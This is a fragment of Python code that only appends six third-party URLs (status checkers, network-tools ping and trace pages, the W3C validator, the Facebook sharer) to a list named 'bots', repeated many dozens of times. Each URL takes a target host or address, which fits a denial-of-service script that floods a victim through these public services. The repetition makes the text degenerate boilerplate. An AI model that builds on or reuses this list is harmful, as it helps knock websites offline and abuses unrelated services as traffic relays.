bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
